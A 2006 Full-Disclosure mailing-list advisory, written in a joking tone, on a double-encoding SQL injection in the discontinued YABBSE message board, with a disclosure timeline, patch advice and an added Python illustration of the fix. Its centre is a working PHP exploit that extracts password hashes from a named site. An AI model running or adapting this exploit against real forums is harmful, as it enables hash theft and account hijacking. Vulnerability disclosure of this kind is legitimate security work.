
List:       full-disclosure
Subject:    [Full-disclosure] NDSD-06-001
From:       "Sam Thomas" <Sam.Thomas () aquaterra ! org>
Date:       2006-06-23 0:43:50
Message-ID: 2438A048A42E974E954C41696816D4893F991C () exchange ! aquaterra ! org

Hey str0ke - Are you the same str0ke whose code I've been ripping? Damn, I guess I better release my first N3td3v Sponsoring Disclosure.....

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsored post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message board.

The specific flaw exists within the "profile.php" PHP script, which is used to give access to user profiles.

-- Vendor Response:
The vendor for this product essentially no longer exists. It is recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerability discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user-supplied variable $user is processed by the urldecode() function twice. Because the web server has already decoded the query string once, a value of %2527 reaches the script as %27 (which contains no quote for magic quotes to escape) and is only turned into a literal ' by the second urldecode(). This is the classic double-encoding SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any user's (e.g. admin) password hash, which in turn can be used to impersonate and log in as that user:

**BEGIN PoC Code

<?php
/*
 yabbse exploit

 all versions - product discontinued

 most of the code ripped from http://www.milw0rm.com/exploits/1036
 so credit to str0ke and milw0rm
*/

$server = "www.uberhacker.com";
$user = "Dozix007";
$port = 80;

$hash = "";

/* Recover the 32-character hash one hex digit at a time, using the
   presence or absence of the board's error page as the oracle. */
$hex = "0123456789abcdef";
for ($i = 1; $i <= 32; $i++) {
        $idx = 0;
        $found = false;

        while (!$found) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes. This is
                   translated to ' by urldecode. */
                $url = "/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
                $header = getHeader($server, $port, $url, "");
                if (!preg_match("/An Error Has Occurred/", $header)) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;
                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

/* Issue a plain HTTP/1.1 GET and return the raw response read so far. */
function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "GET $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                $header = "";

                do {
                        $header .= fread($fp, 512);
                } while (!preg_match('/\r\n\r\n$/', $header));
        }

        return $header;
}
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]
?>

** End PoC Code

-- Patch

It is recommended that, if you insist on continuing to use this product, you remove the line which reads "$user = urldecode($user);" from all functions in "\sources\profile.php".
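An added illustration (Python with sqlite3; not YABBSE code and not the author's PoC) of the decode-order flaw described above and of why removing the second decode and binding the value fixes it. The member table, the hash value and the add_slashes() stand-in for PHP's magic_quotes_gpc are constructed for this example.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for YABBSE's member table; the hash is a made-up value.
SAMPLE_USERS = [("Dozix007", "5d41402abc4b2a76b9719d911017c592")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (user TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    return conn


def add_slashes(s):
    """Approximation of PHP magic_quotes_gpc: backslash-escape quotes and backslashes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def decode_stages(raw_query_value):
    """Trace a query-string value through: web server decode -> magic quotes -> urldecode()."""
    after_server = unquote(raw_query_value)   # first decode, done before PHP sees the value
    after_quotes = add_slashes(after_server)  # escaping only sees this intermediate form
    after_second = unquote(after_quotes)      # the extra urldecode() in profile.php
    return after_server, after_quotes, after_second


def vulnerable_lookup(conn, user_param):
    """profile.php pattern: escape, decode AGAIN, concatenate. %2527 arrives as %27,
    which the escaping step ignores; the second decode turns it into a quote."""
    user = unquote(add_slashes(user_param))
    sql = "SELECT user FROM members WHERE user='" + user + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_param):
    """Patched pattern: no second decode, and the value is a bound parameter,
    so it can only ever be compared literally against the user column."""
    return conn.execute("SELECT user FROM members WHERE user=?", (user_param,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(decode_stages("%27"))    # single encoding: the quote is escaped
    print(decode_stages("%2527"))  # double encoding: a bare quote survives
    probe = "Dozix007%27 AND substr(passwd,1,1)=%275"  # as the app sees it after the server decode
    print(vulnerable_lookup(db, probe))  # one row: the comparison altered the query
    print(safe_lookup(db, probe))        # no rows: treated as a non-existent literal username
```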

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsoring disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could.

The NDSD is unique in how vulnerability information sponsors the incompetency of n3td3v: for each amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints against n3td3v claim that (s/)he contributes nothing to the security community. The aim of NDSD is to sponsor n3td3v posts, thus ensuring that each directly corresponds to a positive contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com - a legal hacker training site which had as its primary challenge to hijack the website. The site has since had the majority of its content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk); one day we might get our website up.





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

